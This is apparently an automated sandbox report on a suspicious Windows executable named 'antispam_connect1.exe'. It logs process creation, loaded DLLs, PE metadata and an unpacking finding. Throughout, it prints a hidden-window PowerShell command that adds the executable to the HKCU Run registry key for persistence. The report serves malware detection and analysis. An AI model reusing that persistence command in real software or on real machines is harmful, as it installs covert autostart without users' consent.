        Source: unknownProcess created: C:\Users\user\Desktop\antispam_connect1.exe "C:\Users\user\Desktop\antispam_connect1.exe"
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\Desktop\antispam_connect1.exe "C:\Users\user\Desktop\antispam_connect1.exe"
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\Desktop\antispam_connect1.exe "C:\Users\user\Desktop\antispam_connect1.exe"
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"Jump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"Jump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"Jump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: avifil32.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: avifil32.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: avifil32.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: antispam_connect1.exeStatic file information: File size 6955008 > 1048576
        Source: antispam_connect1.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x439000
        Source: antispam_connect1.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x254e00
        Source: antispam_connect1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: antispam_connect1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: antispam_connect1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: antispam_connect1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: antispam_connect1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: antispam_connect1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: antispam_connect1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
        Source: antispam_connect1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: antispam_connect1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: antispam_connect1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: antispam_connect1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: antispam_connect1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: antispam_connect1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        barindex
        Detected unpacking (creates a PE file in dynamic memory)
        Source: C:\Users\user\Desktop\antispam_connect1.exeUnpacked PE file: 0.2.antispam_connect1.exe.4120000.1.unpack
        Suspicious powershell command line found
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"Jump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"Jump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_048F6D40 pushfd ; iretd 2_2_048F6D4D
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
